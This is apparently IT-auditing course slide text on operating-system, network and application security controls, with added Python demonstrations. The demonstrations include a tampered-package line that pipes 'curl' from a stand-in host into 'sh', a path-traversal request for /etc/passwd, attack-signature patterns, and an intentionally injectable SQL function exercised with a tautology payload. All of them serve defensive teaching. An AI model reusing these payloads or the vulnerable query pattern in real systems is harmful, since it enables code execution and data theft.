© 2016 Cengage Learning®. May not be scanned, copied or duplicated or posted to a publicly accessible website, in whole or in part, except for use as permitted in a license
distributed with a certain product or service or otherwise on a password-protected website or school-approved learning management system for classroom use.
Learning Objectives
Business Continuity Plan and Disaster Recovery Planning
Disaster Recovery Planning
DRP Audit Procedures
Operating Systems Security
o Log-On Procedure:
o First line of defense against unauthorized access, consisting of
user IDs and passwords.
o Access Token:
o Created at log-on; contains key information about the user (ID, group
memberships, privileges) that the operating system consults to approve
each action attempted during the session.
o Access Control List:
o Assigned to each IT resource; lists which users or groups may access
the resource and what they may do with it.
o Discretionary Access Privileges:
o Allow the owner of a resource to grant access to another user.
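The four controls on this slide fit together in one flow: the log-on procedure issues a token, every later request is judged by matching the token's principals against the resource's ACL, and a discretionary grant is simply the owner editing that ACL. The following is an added example written for this page, not code from the textbook; the user names, passwords, group memberships and the "ledger" resource are constructed for the demonstration.

```python
# Added example (not from the textbook): a minimal model of log-on, access
# token, ACL and discretionary grant. All users, passwords and groups below
# are constructed for the demonstration.
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, Optional, Set


def _hash(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2 so the credential store never holds clear-text passwords."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


_SALTS = {"alice": secrets.token_bytes(16), "bob": secrets.token_bytes(16)}
CREDENTIALS = {
    "alice": _hash("correct horse battery", _SALTS["alice"]),
    "bob": _hash("hunter2", _SALTS["bob"]),
}
GROUPS = {"alice": {"finance"}, "bob": {"dev"}}   # constructed group membership


@dataclass(frozen=True)
class AccessToken:
    """Issued once by the log-on procedure; every later action is judged on it."""
    user: str
    groups: FrozenSet[str]


@dataclass
class Resource:
    """An IT resource and its ACL: principal (user or group) -> allowed actions."""
    owner: str
    acl: Dict[str, Set[str]] = field(default_factory=dict)


def log_on(user: str, password: str) -> Optional[AccessToken]:
    """Log-on procedure: only a matching user ID and password yield a token."""
    stored = CREDENTIALS.get(user)
    if stored is None:
        _hash(password, b"\0" * 16)   # same cost for unknown IDs: no user enumeration by timing
        return None
    if not hmac.compare_digest(stored, _hash(password, _SALTS[user])):
        return None
    return AccessToken(user, frozenset(GROUPS.get(user, ())))


def authorize(token: AccessToken, resource: Resource, action: str) -> bool:
    """ACL check: the user's own entry or one of their groups must grant the action."""
    principals = {token.user, *token.groups}
    return any(action in resource.acl.get(p, set()) for p in principals)


def grant(token: AccessToken, resource: Resource, grantee: str, action: str) -> bool:
    """Discretionary access: only the owner may extend the ACL. The owner can
    grant to anyone, which is why DAC grants need periodic review by the auditor."""
    if token.user != resource.owner:
        return False
    resource.acl.setdefault(grantee, set()).add(action)
    return True


def demo() -> Dict[str, bool]:
    ledger = Resource(owner="alice", acl={"alice": {"read", "write"}, "finance": {"read"}})
    alice = log_on("alice", "correct horse battery")
    bob = log_on("bob", "hunter2")
    results = {
        "bad_password_rejected": log_on("alice", "wrong") is None,
        "bob_read_before_grant": authorize(bob, ledger, "read"),
        "bob_cannot_grant_himself": grant(bob, ledger, "bob", "read"),
        "owner_grants": grant(alice, ledger, "bob", "read"),
    }
    results["bob_read_after_grant"] = authorize(bob, ledger, "read")
    results["bob_still_no_write"] = authorize(bob, ledger, "write")
    return results


if __name__ == "__main__":
    print(demo())
```

The audit point the demo makes explicit: after Alice's discretionary grant, Bob reads the ledger although no administrator ever approved it, so an auditor reviewing access has to look at the ACLs as they stand, not only at the original provisioning records.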
Threats to Operating System Integrity
o Accidental threats include hardware failures and errors in user
applications.
o Intentional threats are often attempts to illegally access data or
violate privacy for financial gain.
o A growing threat is destructive programs that bring the attacker no
apparent gain. They come from three sources:
o Privileged personnel who abuse their authority.
o Individuals who browse the operating system to identify and exploit
security flaws.
o Individuals who insert viruses or other destructive programs into
the operating system, either intentionally or unintentionally.
Operating Systems Controls
Password Controls
Controlling Against Malicious & Destructive Programs
o Organizations can reduce these threats by:
o Purchasing software only from reputable vendors, in its original packaging.
o Issuing a policy on unauthorized or illegal software.
o Examining upgrades and public-domain software for viruses before
implementation and use.
o Implementing formal procedures for changing programs.
o Educating users about the threats.
o Testing all applications before implementation.
o Making frequent backups and limiting users to read and execute rights
whenever possible.
o Requiring log-on protocols that invoke the operating system's own log-on
procedure directly (for example a secure attention key), so that a
Trojan-horse log-on screen is bypassed, and using antiviral software.
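Two of the controls above are mechanical enough to show in code: examining an upgrade before use, and installing it with read-and-execute rights only. The following is an added example for this page, not code from the textbook; the package bytes, the vendor manifest and the file-mode values are constructed for the demonstration.

```python
# Added example (not from the textbook). The package bytes, the manifest and
# the mode values are constructed for the demonstration.
import hashlib
import hmac
import stat
from typing import Dict

# Constructed "vendor manifest": file name -> published SHA-256 digest. In
# practice this must reach you over an authenticated channel (a signed
# manifest or the vendor's TLS-protected site), never from the same mirror
# that served the package, or an attacker simply replaces both together.
GENUINE_PACKAGE = b"#!/bin/sh\necho 'applying upgrade 2.1'\n"
MANIFEST: Dict[str, str] = {
    "upgrade-2.1.sh": hashlib.sha256(GENUINE_PACKAGE).hexdigest(),
}


def verify_package(name: str, data: bytes, manifest: Dict[str, str] = MANIFEST) -> bool:
    """Accept a package only if it is listed and its digest matches exactly."""
    expected = manifest.get(name)
    if expected is None:
        return False                      # unknown file: refuse rather than guess
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(expected, actual)


def install_mode_ok(mode: int) -> bool:
    """'Read and execute rights only': the installed file must not be writable
    by group or others, so a user cannot later swap in a Trojan horse."""
    return not (stat.S_IMODE(mode) & (stat.S_IWGRP | stat.S_IWOTH))


def demo() -> Dict[str, bool]:
    # Constructed tampering: one line inserted into the otherwise genuine upgrade.
    tampered = GENUINE_PACKAGE.replace(b"echo", b"curl http://evil.invalid/x | sh\necho")
    return {
        "genuine_accepted": verify_package("upgrade-2.1.sh", GENUINE_PACKAGE),
        "tampered_rejected": not verify_package("upgrade-2.1.sh", tampered),
        "unlisted_rejected": not verify_package("hotfix.sh", GENUINE_PACKAGE),
        "mode_0755_ok": install_mode_ok(0o100755),
        "mode_0777_rejected": not install_mode_ok(0o100777),
    }


if __name__ == "__main__":
    print(demo())
```

A digest check only proves the file is the one the vendor published; it says nothing about whether the vendor's own build was clean, which is why the slide still calls for testing before implementation.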
System Audit Trail Controls
o System audit trails are logs that record activity at the system,
application and user level.
o Two types of audit logs:
o Keystroke monitoring records the user's keystrokes and
the system's responses.
o Event monitoring summarizes key activities related to system
resources: who logged on and when, which programs ran, which files
and other resources were accessed.
o Audit trails can be used to detect unauthorized access,
reconstruct events and promote personal accountability.
o Benefits must be balanced against costs (storage, processing overhead,
and the effort of reviewing the logs).
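The three uses of an audit trail named above (detecting unauthorized access, reconstructing events, accountability) each correspond to a query over the event log. The following is an added example for this page, not code from the textbook; the log lines and their format (timestamp, user, event, detail) are constructed, as are the business hours assumed for the out-of-hours check.

```python
# Added example (not from the textbook): detection and reconstruction over an
# event-monitoring audit trail. The log and its format are constructed.
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Iterator, List, Set, Tuple

# Constructed event log: "timestamp user event detail", in time order.
LOG = """\
2016-03-01T08:00:01 alice LOGON_OK 10.1.1.5
2016-03-01T08:02:10 alice READ payroll.dat
2016-03-01T08:03:44 alice LOGOFF 10.1.1.5
2016-03-01T23:10:02 bob LOGON_FAIL 203.0.113.7
2016-03-01T23:10:05 bob LOGON_FAIL 203.0.113.7
2016-03-01T23:10:09 bob LOGON_FAIL 203.0.113.7
2016-03-01T23:10:12 bob LOGON_FAIL 203.0.113.7
2016-03-01T23:10:15 bob LOGON_FAIL 203.0.113.7
2016-03-01T23:10:20 bob LOGON_OK 203.0.113.7
2016-03-01T23:11:00 bob DELETE payroll.dat
"""


def parse(log: str) -> Iterator[Tuple[datetime, str, str, str]]:
    for line in log.splitlines():
        ts, user, event, detail = line.split(" ", 3)
        yield datetime.fromisoformat(ts), user, event, detail


def failed_logon_bursts(log: str, threshold: int = 5,
                        window: timedelta = timedelta(minutes=1)) -> Set[Tuple[str, str]]:
    """Detecting unauthorized access: (user, source) pairs with at least
    `threshold` failed log-ons inside a sliding `window`. Assumes time order."""
    recent = defaultdict(list)
    alerts = set()
    for ts, user, event, src in parse(log):
        if event != "LOGON_FAIL":
            continue
        key = (user, src)
        recent[key] = [t for t in recent[key] if ts - t <= window] + [ts]
        if len(recent[key]) >= threshold:
            alerts.add(key)
    return alerts


def reconstruct(log: str, user: str) -> List[Tuple[str, str, str]]:
    """Reconstructing events: everything `user` did, in order (accountability)."""
    return [(ts.isoformat(), event, detail)
            for ts, u, event, detail in parse(log) if u == user]


def out_of_hours_sensitive(log: str, start_hour: int = 7, end_hour: int = 19,
                           sensitive=("DELETE", "WRITE")) -> List[Tuple[str, str, str, str]]:
    """Sensitive operations outside assumed business hours (07:00-19:00)."""
    return [(ts.isoformat(), user, event, detail)
            for ts, user, event, detail in parse(log)
            if event in sensitive and not (start_hour <= ts.hour < end_hour)]


if __name__ == "__main__":
    print(failed_logon_bursts(LOG))
    print(reconstruct(LOG, "bob"))
    print(out_of_hours_sensitive(LOG))
```

Run on the constructed log, the burst detector flags bob's account from 203.0.113.7, and the reconstruction shows that the sixth attempt succeeded and was followed by a deletion at 23:11, which is the sequence an investigator needs and the reason the cost of keeping the trail is usually worth paying.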
Technical and Administrative Controls
Network security is the protection of the network perimeter, as well as the segmentation of the internal
corporate network. Oftentimes, management devotes resources to protecting its network from outsiders but
fails to properly segment its internal network based on risks. Much like logical access control, network
resources and segments should only be made available to those who require them. An example of this would
be segmenting the Research and Development network from the rest of the organisation due to the sensitive
nature of the information that is handled in such an environment.
Firewalls
Routers
What is a Server?
File Server
A file server is a server that stores files and makes them accessible to other clients on the network. Its sole
responsibility is storing and managing a set of files; clients read and write those files over the network without
copying them to their local systems.
Print Server
A print server is a server with a dedicated printer attached to it. Other clients on the same network send their
print jobs to that printer through the print server.
Web Server
A web server is a server running HTTP (Hypertext Transfer Protocol) software that serves web pages in response to
requests from clients. For example, if you type www.ismellgood.com/homepage into your browser, you are requesting a
page called homepage stored on a server under the domain ismellgood.com. In response, the web server locates that
page and returns it to your browser. If you mistype www.ismellgood.com/homewage, the server returns an error saying
the web page was not found. Well, that's familiar!
Application Server
An application server hosts and manages the applications that sit between an organization's users and its databases
or back-end business systems. If you have visited a bank to withdraw money, you have used the bank's application
server through the attending teller: the teller's machine runs the banking application, which calls the application
server to retrieve your account details and complete the transaction.
LAN with File and Print Servers
Network Security
Firewalls are network hardware and software that block unauthorised or unverified access to computer
systems and network assets. These tools survey incoming and outgoing transmissions and decide what type of
traffic to permit onto an organisation’s internal network based on factors such as origination or destination
address, content of the message, protocol being used to transmit the message, and other filtering methods.
Controlling Risks from Subversive Threats
o Firewalls prevent unauthorized access to or from a private network.
To accomplish this:
o All traffic between the outside network and the organization's intranet must
pass through the firewall.
o Only authorized traffic is allowed through, and the firewall itself must
be immune to penetration.
o Network-level firewalls provide efficient but low-security control.
o A screening router examines the source and destination addresses of
incoming packets but does not explicitly authenticate outside users,
so it trusts whatever source address a packet carries.
o Application-level firewalls provide higher, customizable network
security, but add overhead cost.
o There is a trade-off between convenience and security.
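The screening-router model above, applied to the Research and Development segmentation case from the earlier Technical and Administrative Controls slide, is small enough to show as working code. The following is an added example for this page, not code from the textbook or from any firewall product; the subnets, rule set and packets are constructed, and the ingress check is the one addition a practitioner would insist on because the router itself does not authenticate the source address.

```python
# Added example (not from the textbook): a screening-router style packet filter
# over constructed subnets, rules and packets. Decides per packet on addresses,
# protocol and port only, like a network-level firewall; no connection state.
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

IPv4Network = ipaddress.IPv4Network


@dataclass(frozen=True)
class Rule:
    action: str              # "allow" or "deny"
    src: IPv4Network
    dst: IPv4Network
    proto: str               # "tcp", "udp" or "any"
    dport: Optional[int]     # None matches any destination port


def net(cidr: str) -> IPv4Network:
    return ipaddress.ip_network(cidr)


# Constructed segments
RND = net("10.20.0.0/16")          # research and development
CORP = net("10.10.0.0/16")         # general corporate LAN
PATCH_SERVER = net("10.10.5.10/32")
ANY = net("0.0.0.0/0")
INTERNAL = [RND, CORP]

# First match wins, so the narrow allow precedes the broad deny.
RULES: List[Rule] = [
    Rule("allow", RND, PATCH_SERVER, "tcp", 443),   # R&D may fetch patches, nothing else
    Rule("deny", RND, CORP, "any", None),           # no other R&D -> corporate traffic
    Rule("deny", CORP, RND, "any", None),           # and none the other way
    Rule("allow", CORP, ANY, "tcp", 443),           # corporate users may browse out
    Rule("allow", CORP, ANY, "tcp", 80),
]


def decide(src: str, dst: str, proto: str, dport: int,
           ingress: str = "internal", rules: List[Rule] = RULES) -> str:
    """Return "allow" or "deny". Anything no rule matches is denied (default deny)."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    # Anti-spoofing: a packet arriving on the external interface must not claim
    # an inside source address; without this the first allow rule is forgeable.
    if ingress == "external" and any(s in n for n in INTERNAL):
        return "deny"
    for r in rules:
        if (s in r.src and d in r.dst
                and r.proto in ("any", proto)
                and r.dport in (None, dport)):
            return r.action
    return "deny"


if __name__ == "__main__":
    print(decide("10.20.3.4", "10.10.5.10", "tcp", 443))                     # allow
    print(decide("10.20.3.4", "10.10.5.10", "tcp", 443, ingress="external"))  # deny: spoofed
```

The last call is the caveat from the slide in concrete form: a packet from the Internet bearing an R&D source address satisfies every field the screening router looks at, and only knowledge of which interface it arrived on lets the filter reject it.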
Network Security
An intrusion detection system (IDS) is a device or software application that monitors an organisation's
inbound and outbound network activity and identifies suspicious patterns of activity that may indicate a
network or system attack or a security policy violation. An IDS alerts administrators when someone or
something is trying to compromise the information system through malicious activity or policy violations.
These systems are designed to supplement firewalls and other forms of network security by detecting malicious
activity in the monitored network traffic or system activity. They act much like a motion sensor, detecting
intruders who have already bypassed perimeter security.
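An IDS recognises "suspicious patterns" in two distinct ways: by matching known attack signatures in the traffic, and by flagging behaviour that is abnormal even though no single packet is malicious. The following is an added example for this page, not code from the textbook or from any IDS product; the connection records and the two signatures are constructed, and the traffic deliberately includes an attack from an inside host that a perimeter firewall would never see, to match the motion-sensor analogy.

```python
# Added example (not from the textbook): signature and anomaly detection over
# constructed connection records of the form (time_s, src, dst, dport, payload).
import re
from collections import defaultdict
from typing import List, Set, Tuple

Record = Tuple[float, str, str, int, bytes]

SCAN_PORTS = [21, 22, 23, 25, 53, 80, 110, 139, 143, 445]

# Constructed traffic: one normal request, a fast port scan from outside, and a
# path-traversal attempt from an inside host (already past the perimeter).
TRAFFIC: List[Record] = (
    [(0.0, "10.10.1.7", "10.10.5.20", 443, b"GET /index.html HTTP/1.1")]
    + [(1.0 + i * 0.1, "203.0.113.9", "10.10.5.20", p, b"") for i, p in enumerate(SCAN_PORTS)]
    + [(3.0, "10.10.1.7", "10.10.5.20", 80, b"GET /cgi-bin/view?f=../../etc/passwd HTTP/1.1")]
)

# Constructed signatures: known attack patterns to look for in payloads.
SIGNATURES = {
    "directory-traversal": re.compile(rb"(\.\./){2,}"),
    "sql-tautology": re.compile(rb"'\s*or\s*'1'\s*=\s*'1", re.IGNORECASE),
}


def signature_alerts(traffic: List[Record], signatures=SIGNATURES) -> List[Tuple[float, str, str]]:
    """Misuse detection: (time, source, signature name) for every payload match."""
    return [(t, src, name)
            for t, src, _dst, _port, payload in traffic
            for name, pat in signatures.items() if pat.search(payload)]


def port_scan_alerts(traffic: List[Record], min_ports: int = 10,
                     window: float = 5.0) -> Set[Tuple[str, str]]:
    """Anomaly detection: a source contacting at least `min_ports` distinct ports on
    one host within `window` seconds. Records are assumed to be in time order."""
    recent = defaultdict(list)            # (src, dst) -> [(t, dport)]
    alerts = set()
    for t, src, dst, dport, _ in traffic:
        key = (src, dst)
        recent[key] = [(ts, p) for ts, p in recent[key] if t - ts <= window] + [(t, dport)]
        if len({p for _, p in recent[key]}) >= min_ports:
            alerts.add(key)
    return alerts


if __name__ == "__main__":
    print(signature_alerts(TRAFFIC))
    print(port_scan_alerts(TRAFFIC))
```

Signature matching catches only what is already known, which is why the anomaly rule is there; tuning `min_ports` and `window` is the trade-off between missed scans and alert noise that every IDS deployment has to make.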
Technical and Administrative Controls
Encryption is one of the most effective methods of protecting networks and communications against attacks.
Encryption is the process of scrambling information so that it is unreadable by anyone who does not hold the
decryption key. The decision to use encryption should be made in light of the risks and after a cost-benefit
analysis. There are, however, drawbacks to encryption, including the cost of the encryption device, the cost of
administering it (above all, managing the keys), and the inherent delays incurred by the extra processing steps.
Technical and Administrative Controls
PATCH MANAGEMENT Every week, new vulnerabilities are discovered in operating systems and applications,
and attackers exploit these vulnerabilities to gain access to systems. To protect against such exposures,
system administrators should install patches as soon as they become available and have been tested. Proper
patch management closes the known vulnerabilities that worms and older exploits rely on.
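The check at the heart of patch management is deciding whether an installed version is older than the version in which a vulnerability was fixed, and the common mistake is comparing version strings as text. The following is an added example for this page, not code from the textbook; the host inventory and the "fixed in" table are constructed stand-ins for a real asset inventory and vendor advisory feed.

```python
# Added example (not from the textbook). The inventory and the fixed-version
# table are constructed; a real deployment reads them from an asset database
# and vendor advisories.
import re
from typing import Dict, List, Tuple


def version_key(v: str) -> Tuple[Tuple[int, object], ...]:
    """Split a version into comparable pieces so that 1.10 sorts after 1.9 and
    1.0.1g after 1.0.1f; comparing the raw strings gets both wrong. Numbers
    sort before letters at the same position. Pre-release tags such as "rc1"
    would need a scheme-aware comparator and are out of scope here."""
    return tuple((0, int(p)) if p.isdigit() else (1, p)
                 for p in re.findall(r"\d+|[A-Za-z]+", v))


def is_vulnerable(installed: str, fixed_in: str) -> bool:
    return version_key(installed) < version_key(fixed_in)


# Constructed inventory: host -> {package: installed version}
INVENTORY: Dict[str, Dict[str, str]] = {
    "web01": {"openssl": "1.0.1f", "httpd": "2.4.10"},
    "db01": {"openssl": "1.0.2k", "postgres": "9.6.2"},
}

# Constructed advisory data: package -> first version containing the fix
FIXED_IN: Dict[str, str] = {"openssl": "1.0.1g", "httpd": "2.4.12", "postgres": "9.6.3"}


def unpatched(inventory=INVENTORY, fixed_in=FIXED_IN) -> List[Tuple[str, str, str, str]]:
    """(host, package, installed, fixed) for every component below its fixed version."""
    return [(host, pkg, ver, fixed_in[pkg])
            for host, pkgs in inventory.items()
            for pkg, ver in pkgs.items()
            if pkg in fixed_in and is_vulnerable(ver, fixed_in[pkg])]


if __name__ == "__main__":
    for row in unpatched():
        print("%s: %s %s is below fixed version %s" % row)
```

The output is the work list for the administrator; the auditor's interest is the same list over time, since a component that stays on it for weeks is the exposure the slide warns about.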
Application security encompasses controls implemented to prevent exceptions to the security policy of an
application and its underlying systems through flaws in design, development, or deployment. Controls built into
the application reduce the likelihood that it will be manipulated to access, steal, modify, or delete data.
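The clearest instance of a control "built into the application" is how it hands user input to the database: concatenated into the query text, the input can rewrite the query; bound as a parameter, it cannot. The following is an added example for this page, not code from the textbook; it uses an in-memory SQLite table with constructed rows and a constructed hostile input.

```python
# Added example (not from the textbook): the same lookup written without and
# with application-level controls. Rows and the hostile input are constructed.
import re
import sqlite3
from typing import Any, Dict, List, Tuple

OWNER_RE = re.compile(r"^[a-z][a-z0-9_]{0,31}$")   # allow-list for account owner IDs


def setup() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (owner TEXT, balance INTEGER)")
    con.executemany("INSERT INTO accounts VALUES (?, ?)",
                    [("alice", 100), ("bob", 250), ("carol", 75)])
    return con


def balances_unsafe(con: sqlite3.Connection, owner: str) -> List[Tuple[str, int]]:
    """Vulnerable: the caller's string becomes part of the SQL text, so a quote
    in the input changes the query's structure."""
    sql = "SELECT owner, balance FROM accounts WHERE owner = '" + owner + "'"
    return con.execute(sql).fetchall()


def balances_param(con: sqlite3.Connection, owner: str) -> List[Tuple[str, int]]:
    """Control 1: bind the value. Whatever it contains, it is compared as data."""
    return con.execute("SELECT owner, balance FROM accounts WHERE owner = ?",
                       (owner,)).fetchall()


def balances_safe(con: sqlite3.Connection, owner: str) -> List[Tuple[str, int]]:
    """Control 2 on top of 1: validate against the allow-list first, so malformed
    input is rejected at the boundary and never reaches the database."""
    if not OWNER_RE.match(owner):
        raise ValueError("owner must be a short lowercase identifier")
    return balances_param(con, owner)


def demo() -> Dict[str, Any]:
    con = setup()
    hostile = "x' OR '1'='1"
    try:
        validated = balances_safe(con, hostile)
    except ValueError:
        validated = "rejected"
    return {
        "unsafe_rows": len(balances_unsafe(con, hostile)),   # every account leaks
        "param_rows": len(balances_param(con, hostile)),     # no such owner
        "validated": validated,
        "normal": balances_safe(con, "alice"),
    }


if __name__ == "__main__":
    print(demo())
```

Parameter binding alone already defeats the injection; the allow-list is the second, independent control that also stops the malformed request from being logged as a database error and keeps the attempt visible at the application boundary.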
Technical and Administrative Controls
Some of the best practices for ensuring segregation of duties within the information systems department and
between information systems and business unit personnel include:
System users should not have direct access to programme source code.
Development staff should not access system level technology or database management systems.
End users or system operators should not have direct access to programme source code.
Technical and Administrative Controls
Development staff should not have access to production data, unless specifically authorized by the
functional data owner to repair a limited number of records.
End users should not have access to production data except through the features and functions of the
administrative applications; in particular, they should not have the ability to bypass or circumvent the
applications’ validation and audit procedures.
Accounts should be approved by the data steward and subsequently created by a separate, independent
system security administrator.
Access to system logs and system audits should be limited to the system security analysts, and all such
access should be reviewed by IT management.
Access to firewalls and other network security systems should be limited to the network security analysts,
and all such access should be reviewed by IT management.
Auditing Procedures for EDI
Audit Objectives Associated with PC Security